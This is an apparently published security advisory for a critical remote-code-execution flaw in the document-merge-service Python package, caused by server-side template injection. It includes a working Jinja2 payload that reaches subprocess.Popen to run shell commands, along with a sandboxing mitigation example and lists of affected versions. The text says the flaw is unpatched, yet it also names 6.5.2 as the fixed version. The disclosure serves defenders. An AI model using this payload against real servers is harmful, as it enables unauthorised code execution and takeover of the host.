GHSA-v5gf-r78h-55q6

Source
https://github.com/advisories/GHSA-v5gf-r78h-55q6
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-v5gf-r78h-55q6/GHSA-v5gf-r78h-55q6.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-v5gf-r78h-55q6
Aliases
Published
2024-06-11T20:22:55Z
Modified
2024-06-12T19:33:05.271298Z
Severity
  • 9.9 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Summary
document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection
Details

Impact

What kind of vulnerability is it? Who is impacted?

A remote code execution (RCE) via server-side template injection (SSTI) allows user-supplied code to be executed in the server's context. The code runs as the document-merge-server user (UID 901), giving an attacker considerable control over the container.

Patches

Has the problem been patched? What versions should users upgrade to?

It has not been patched.

References

Are there any links users can visit to find out more?

  • https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti

POC

Add the following to a document, upload and render it:

{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} 
ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}

whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}

uname -a:
{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}

{% endif %}

The index might be different, so to debug this first render a template with {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }} and then get the index of subprocess.Popen and replace 202 with that.
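The mitigation a maintainer would apply to this class of bug, shown here as an added example that is not code from document-merge-service: untrusted templates are rendered with Jinja2's SandboxedEnvironment, which refuses attribute names beginning with an underscore, so the `__class__.__mro__[1].__subclasses__()` walk from the POC raises SecurityError instead of reaching subprocess.Popen. The function names, the sample templates and the context values are constructed for this example.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed samples: a benign merge template and the attribute-walking
# probe used in the POC above to locate subprocess.Popen.
BENIGN_TEMPLATE = "Dear {{ name }}, your invoice total is {{ total }}."
PROBE_TEMPLATE = "{{ name.__class__.__mro__[1].__subclasses__() }}"
SAMPLE_CONTEXT = {"name": "Alice", "total": 42}


def render_unsandboxed(template_src: str, context: dict) -> str:
    """Weak setting: a plain Environment lets a template walk Python internals,
    so the probe renders the full subclass list instead of failing."""
    return Environment(autoescape=True).from_string(template_src).render(**context)


def render_untrusted(template_src: str, context: dict) -> str:
    """Corrected setting: SandboxedEnvironment.is_safe_attribute rejects any
    attribute starting with '_', so name.__class__ becomes an Undefined whose
    further use raises SecurityError. Benign templates render unchanged."""
    env = SandboxedEnvironment(autoescape=True)
    return env.from_string(template_src).render(**context)


def probe_is_blocked(template_src: str, context: dict) -> bool:
    """True when the sandbox refuses the template, False when it renders.
    Useful as a unit test guarding the merge endpoint against regressions."""
    try:
        render_untrusted(template_src, context)
    except SecurityError:
        return True
    return False
```

Callers should catch SecurityError at the merge endpoint and log the rejected template source, since a rejected probe is a reliable indicator of an SSTI attempt against the service.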


Affected packages

PyPI / document-merge-service

Package

Name
document-merge-service
Purl
pkg:pypi/document-merge-service

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version / all previous versions are affected)
Fixed
6.5.2

Affected versions

5.*

5.2.0
5.2.1

6.*

6.0.0
6.1.0
6.1.1
6.1.2
6.2.0
6.2.1
6.2.2
6.3.0
6.3.1
6.4.0
6.4.1
6.4.2
6.4.3
6.4.4
6.4.5
6.4.6
6.5.0
6.5.1